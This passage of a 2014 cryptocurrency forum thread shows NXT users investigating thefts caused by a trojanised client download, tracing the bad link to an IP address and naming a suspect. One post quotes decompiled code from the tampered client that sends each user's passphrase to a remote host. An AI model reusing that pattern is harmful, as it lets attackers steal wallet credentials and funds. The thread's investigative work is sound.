plasticAiredale
|
|
January 02, 2014, 01:36:13 PM |
|
Let's keep the historical record straight here. sparta_cuss reported this before PaulyC, and sparta_cuss was immediately blown off by CfB:
Quote from: sparta_cuss on January 01, 2014, 04:05:58 PM
Hey, looks like I just got robbed, too. Someone please check this account: 12152013998194592943 They now have 147k+ from me. Had a 40 char random password, capital, lower, numbers, symbols. WTF?
Quote from CfB:
Can u prove that ur coins were stolen? My account passphrase < 40 chars and contains 2M, why did the thief choose ur account instead of mine? Sorry, but ur case looks more like black PR attempt.
There's a clear pattern if you look at all the data:
Time Victim Vic Account Thief Account NXT 01.01.2014 12:56:54 plasticAiredale 8439060069775407509 15182566201738727933 18665 01.01.2014 12:58:03 PaulyC 16821029889165561706 16204974692852323982 7808 01.01.2014 13:01:45 newcn 16886318053889080545 9793828175536096502 18197 01.01.2014 13:05:06 sparta_cuss 11794318797680953099 12152013998194592943 147690
Somebody is manually stealing data at 3-4 minute intervals and Sparta_cuss was by far the most wronged. We should check the blocks / transactions/ accounts before and after this time period.
Don't forget Framewood, too. Please notice the date and how little the community paid attention.https://bitcointalk.org/index.php?topic=345619.msg4172532#msg4172532This bears repeating: Please notice the date and how little the community paid attention. Yeah unfortunately at the time it was a one time thing, made by a Jr. Member so everybody probably just figured it was user error, plus he didn't raise much of a stink after. Doesn't justify it, but probably explains it. Currently it looks like EpicThomas only was able to get a few accounts. Hopefully now people will be more vigilante with downloading new clients. But if there is no official client, or at least one endorsed by CFB how do we even know if the posted hash is the one for the client that isn't hacked. Who else can we trust?
|
|
|
|
Buratino
Legendary
Offline
Activity: 1151
Merit: 1003
|
|
January 02, 2014, 01:39:04 PM |
|
Is it possible to provide self test (like ECC) mechanism for safety code in Nxt client to prevent thefts in future?
|
|
|
|
salsacz
|
|
January 02, 2014, 01:39:43 PM |
|
...
please add big warning not to use downloading link from the cache. And congrats - now we have all clues.
|
|
|
|
LiQio
Legendary
Offline
Activity: 1181
Merit: 1002
|
|
January 02, 2014, 01:42:16 PM |
|
...
please add big warning not to use downloading link from the cache. And congrats - now we have all clues. Done
|
|
|
|
plasticAiredale
|
|
January 02, 2014, 01:44:30 PM |
|
...
please add big warning not to use downloading link from the cache. And congrats - now we have all clues. Done I modified my posts as well. Good thinking.
|
|
|
|
utopianfuture
Sr. Member
Offline
Activity: 602
Merit: 268
Internet of Value
|
|
January 02, 2014, 01:45:08 PM |
|
Let's keep the historical record straight here. sparta_cuss reported this before PaulyC, and sparta_cuss was immediately blown off by CfB:
Quote from: sparta_cuss on January 01, 2014, 04:05:58 PM
Hey, looks like I just got robbed, too. Someone please check this account: 12152013998194592943 They now have 147k+ from me. Had a 40 char random password, capital, lower, numbers, symbols. WTF?
Don't forget Framewood, too. Please notice the date and how little the community paid attention.https://bitcointalk.org/index.php?topic=345619.msg4172532#msg4172532This bears repeating: Please notice the date and how little the community paid attention. Yeah unfortunately at the time it was a one time thing, made by a Jr. Member so everybody probably just figured it was user error, plus he didn't raise much of a stink after. Doesn't justify it, but probably explains it. Currently it looks like EpicThomas only was able to get a few accounts. Hopefully now people will be more vigilante with downloading new clients. But if there is no official client, or at least one endorsed by CFB how do we even know if the posted hash is the one for the client that isn't hacked. Who else can we trust? We have three groups of core developers: BCNext, CfB and Luc. Luc will release new clients from now on. He just posted the 0.4.9 client and I am running it right now.
|
|
|
|
landomata
Legendary
Offline
Activity: 2184
Merit: 1000
|
|
January 02, 2014, 01:45:32 PM |
|
WHO IS PUNKROCK? This kind of link matches EPICTHOMAS Pattern! We need multiple checks on this.
|
|
|
|
Damelon
Legendary
Offline
Activity: 1092
Merit: 1010
|
|
January 02, 2014, 01:45:35 PM |
|
I just checked the nxt$Crypto.class that I downloaded yesterday via the instructions for linux, and I get this. It doesn't match at all with what is reported should be in there, but is also different from the "modified" file posted yesterday. Can someone explain if I need to freak out or not? import java.security.MessageDigest; import java.util.Arrays;
class Nxt$Crypto { static byte[] getPublicKey(String paramString) { try { byte[] arrayOfByte = new byte[32]; Nxt.Curve25519.keygen(arrayOfByte, null, MessageDigest.getInstance("SHA-256").digest(paramString.getBytes("UTF-8"))); return arrayOfByte; } catch (Exception localException) {} return null; } static byte[] sign(byte[] paramArrayOfByte, String paramString) { try { byte[] arrayOfByte1 = new byte[32]; byte[] arrayOfByte2 = new byte[32]; MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256"); Nxt.Curve25519.keygen(arrayOfByte1, arrayOfByte2, localMessageDigest.digest(paramString.getBytes("UTF-8"))); byte[] arrayOfByte3 = localMessageDigest.digest(paramArrayOfByte); localMessageDigest.update(arrayOfByte3); byte[] arrayOfByte4 = localMessageDigest.digest(arrayOfByte2); byte[] arrayOfByte5 = new byte[32]; Nxt.Curve25519.keygen(arrayOfByte5, null, arrayOfByte4); localMessageDigest.update(arrayOfByte3); byte[] arrayOfByte6 = localMessageDigest.digest(arrayOfByte5); byte[] arrayOfByte7 = new byte[32]; Nxt.Curve25519.sign(arrayOfByte7, arrayOfByte6, arrayOfByte4, arrayOfByte2); byte[] arrayOfByte8 = new byte[64]; System.arraycopy(arrayOfByte7, 0, arrayOfByte8, 0, 32); System.arraycopy(arrayOfByte6, 0, arrayOfByte8, 32, 32); return arrayOfByte8; } catch (Exception localException) {} return null; } static boolean verify(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, byte[] paramArrayOfByte3) { try { byte[] arrayOfByte1 = new byte[32]; byte[] arrayOfByte2 = new byte[32]; System.arraycopy(paramArrayOfByte1, 0, arrayOfByte2, 0, 32); byte[] arrayOfByte3 = new byte[32]; System.arraycopy(paramArrayOfByte1, 32, arrayOfByte3, 0, 32); Nxt.Curve25519.verify(arrayOfByte1, arrayOfByte2, arrayOfByte3, paramArrayOfByte3); MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256"); byte[] arrayOfByte4 = localMessageDigest.digest(paramArrayOfByte2); localMessageDigest.update(arrayOfByte4); byte[] arrayOfByte5 = localMessageDigest.digest(arrayOfByte1); return Arrays.equals(arrayOfByte3, arrayOfByte5); } catch (Exception localException) {} return false; } }
|
|
|
|
rlh
|
|
January 02, 2014, 01:45:58 PM |
|
Sorry if I'm the 1 millionth person to ask but... source?
|
A Personal Quote on BTT from 2011: "I'd be willing to make a moderate "investment" if the value of the BTC went below $2.00. Otherwise I'll just have to live with my 5 BTC and be happy. :/" ...sigh. If only I knew.
|
|
|
bidji29
|
|
January 02, 2014, 01:48:33 PM |
|
Sorry if I'm the 1 millionth person to ask but... source?
Tommorow
|
|
|
|
rlh
|
|
January 02, 2014, 01:50:17 PM |
|
Sorry if I'm the 1 millionth person to ask but... source?
Tommorow Ah, I see now. I didn't realize it was pushed back a day. Thank you.
|
A Personal Quote on BTT from 2011: "I'd be willing to make a moderate "investment" if the value of the BTC went below $2.00. Otherwise I'll just have to live with my 5 BTC and be happy. :/" ...sigh. If only I knew.
|
|
|
salsacz
|
|
January 02, 2014, 01:50:46 PM |
|
Punkrock is a german mod who was releasing posts about new versions of the clients. He also changed the downloading link from the Drexme's post. But all punkrock's links were OK, they lead to the right MEGA links.
|
|
|
|
landomata
Legendary
Offline
Activity: 2184
Merit: 1000
|
|
January 02, 2014, 01:51:12 PM |
|
Sorry if I'm the 1 millionth person to ask but... source?
Tommorow Ah, I see now. I didn't realize it was pushed back a day. Thank you. It was always set for the 3rd of Jan
|
|
|
|
utopianfuture
Sr. Member
Offline
Activity: 602
Merit: 268
Internet of Value
|
|
January 02, 2014, 01:52:17 PM |
|
Sorry if I'm the 1 millionth person to ask but... source?
Tommorow Ah, I see now. I didn't realize it was pushed back a day. Thank you. Nah it was not pushed back. Always intend to be released on 5th Bitcoin birthday January, 3.
|
|
|
|
rickyjames
|
|
January 02, 2014, 01:55:30 PM Last edit: January 02, 2014, 02:20:25 PM by rickyjames |
|
OK, a summary of that we know so far: The smoking gun points to EpicThomas, and kudos to LiQio for finding the smoking gun. Go to the Google cache page LiQio found below, then hover your mouse over the link where EpicThomas says "NRS 0.4.8 is ready and can be downloaded from: http://info.nxtcrypto.org/nxt-client-0.4.8.zip". The mouseover link that appears goes to http://162.243.246.233/nxt-client-0.4.8.zip even tho the blue text of the link says http://info,nxtcrypto.org/nxt-client-0.4.8.zip. http://webcache.googleusercontent.com/search?q=cache:x1fHlORdUIEJ:https://bitcointalk.org/index.php%3Ftopic%3D345619.11820+&cd=1&hl=de&ct=clnk&gl=deEpicThomas made is original post which contained the bad link at 31.12.2013 13:23:22 and then later edited his post and CHANGED IT BACK to the correct client. The 0.4.8 losses were first reported by Sparta_cuss (147K NXT), then PaulyC (8K) , then newcn (18K), then plasticAiredale (19K). The 0.4.8 losses we do know of came in a 8 minute window: Time Victim Vic Account Thief Account NXT 01.01.2014 12:56:54 plasticAiredale 8439060069775407509 15182566201738727933 18665 01.01.2014 12:58:03 PaulyC 16821029889165561706 16204974692852323982 7808 01.01.2014 13:01:45 newcn 16886318053889080545 9793828175536096502 18197 01.01.2014 13:05:06 sparta_cuss 11794318797680953099 12152013998194592943 147690 There may well be more 0.4.8 losses that haven't been discovered or reported yet. There may have been losses from earlier clients before 0.4.8, as first reported by Framewood on December 27, 2013, 06:26:16 PM See: https://bitcointalk.org/index.php?topic=345619.msg4172532#msg4172532 . If so, here is the first reported loss: Time Victim Vic Account Thief Account NXT 26.12.2013 17:09:30 Framewood 697109629372813510 13643712185318669838 100088 Total reported losses so far are 292,448 NXT worth around 28 BTC or over $23,000. There's got to be more. Keep digging.
|
|
|
|
pinarello
Full Member
Offline
Activity: 266
Merit: 100
NXT is the future
|
|
January 02, 2014, 01:56:39 PM |
|
Is 17480583094667840121 your new account? That is not my account. Sorry that was directed to PaulyC. Hey sorry just saw this. That's very generous! thanks Gbeirn. I don't even know when I'll check if it's in there, I'm freaked until the *confirmed client.. hah Yes this account hasn't been compromised and has a strong 40+ random PW, I haven't used it since 4.7e! Edit** Decided as everyone should to start fresh new Acct# with the windows installer from Pg. 1. Check sum'd and Hash good. thanks to anyone who can contribute. NXT 14008664550450326382 I did get a pm from another poster who mentioned setting up a bounty for me, so I don't know what the protocol is here, sorry. thanks! So you confirm that windows installer from page 1 is ok? Pin
|
|
|
|
Damelon
Legendary
Offline
Activity: 1092
Merit: 1010
|
|
January 02, 2014, 02:00:21 PM |
|
No problem I would also be interested if with the advent of the asset exchange it would be possible to move all my 1350+ aliases to a new account. Took me quite a while to get them and I would HATE to lose them!
|
|
|
|
utopianfuture
Sr. Member
Offline
Activity: 602
Merit: 268
Internet of Value
|
|
January 02, 2014, 02:01:59 PM |
|
OK, a summary of that we know so far: The smoking gun points to EpicThomas, and kudos to LiQio for finding the smoking gun. Go to the Google cache page LiQio found below, then hover your mouse over the link where EpicThomas says "NRS 0.4.8 is ready and can be downloaded from: http://info.nxtcrypto.org/nxt-client-0.4.8.zip". The mouseover link that appears goes to http://162.243.246.233/nxt-client-0.4.8.zip even tho the blue text of the link says http://info,nxtcrypto.org/nxt-client-0.4.8.zip. http://webcache.googleusercontent.com/search?q=cache:x1fHlORdUIEJ:https://bitcointalk.org/index.php%3Ftopic%3D345619.11820+&cd=1&hl=de&ct=clnk&gl=deEpicThomas then later edited his post and CHANGED IT BACK to the correct client. The 0.4.8 losses were first reported by Sparta_cuss (147K NXT), then PaulyC (8K) , then newcn (18K), then plasticAiredale (19K). The 0.4.8 losses we do know of came in a 8 minute window: Time Victim Vic Account Thief Account NXT 01.01.2014 12:56:54 plasticAiredale 8439060069775407509 15182566201738727933 18665 01.01.2014 12:58:03 PaulyC 16821029889165561706 16204974692852323982 7808 01.01.2014 13:01:45 newcn 16886318053889080545 9793828175536096502 18197 01.01.2014 13:05:06 sparta_cuss 11794318797680953099 12152013998194592943 147690 There may well be more 0.4.8 losses that haven't been discovered or reported yet. There may have been losses from earlier clients before 0.4.8, as first reported by Framewood on December 27, 2013, 06:26:16 PM. If so, here is the first reported loss: Time Victim Vic Account Thief Account NXT 26.12.2013 17:09:30 Framewood 697109629372813510 13643712185318669838 100088 Total reported losses so far are 292,448 NXT worth around 28 BTC or over $23,000. There's got to be more. Keep digging. More evidence. The ip address where the bogus client was stored belongs to EpicThomas, the same as epicdices.com Quote from: notsoshifty on Today at 01:46:08 AM Quote from: notsoshifty on Today at 01:38:41 AM Interesting...: Code: if (!paramString.equals("")) { if (!myKeys.contains(paramString)) { URL url = new URL(" http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1")); URLConnection connection = url.openConnection(); connection.setConnectTimeout(10000); connection.getInputStream(); myKeys.add(paramString); } } epicdices.com is also hosted on 162.243.246.223 - coincidence? no, as I wrote here, we know identity of the hacker: 162.243.246.223 looks like it is "epicdices.com" ( http://domain-kb.com/www/epicdices.com) Owner of epicdices - EpicThomas - is a member of this topic: https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts
|
|
|
|
bahamapascal
|
|
January 02, 2014, 02:02:06 PM |
|
C-f-B, or any other dev here, could you review this Idea? And let us know your opinion, I am not a coder so maybe my Idea is not possible from a technical point of view.
It's multisig feature that is scheduled on later date. LOL, so I just reinvented the wheel Never knew multisig was meant to be used for 2fa, cool
|
|
|
|
mnightwaffle
|
|
January 02, 2014, 02:03:05 PM |
|
So you confirm that windows installer from page 1 is ok?
Pin
yes, the above checks out Not 100% sure about the self-installing client
|
|
|
|
|